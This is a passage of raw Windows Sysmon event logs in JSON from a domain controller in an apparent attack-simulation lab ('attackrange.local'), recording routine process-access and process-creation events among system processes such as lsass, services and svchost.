06:49:07.490","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","SourceProcessId":"1196","SourceThreadId":"1992","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1137,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.740\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.740","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1138,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.740\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.740","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1139,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.740\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.740","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1140,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.740\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.740","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1141,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.749\r\nProcessGuid: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nProcessId: 1976\r\nImage: C:\\Windows\\System32\\svchost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for Windows Services\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: svchost.exe\r\nCommandLine: C:\\Windows\\System32\\svchost.exe -k smbsvcs\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.749","ProcessGuid":"{E2A3D6B1-1064-5F25-0000-001067A00200}","Image":"C:\\Windows\\System32\\svchost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for Windows Services","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"svchost.exe","CommandLine":"C:\\Windows\\System32\\svchost.exe -k smbsvcs","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1142,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.740\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.740","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1143,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.740\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.740","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1144,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.740\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1180\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-1064-5F25-0000-001067A00200}\r\nTargetProcessId: 1976\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:08.740","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1180","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-1064-5F25-0000-001067A00200}","TargetProcessId":"1976","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1145,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:08.802\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: 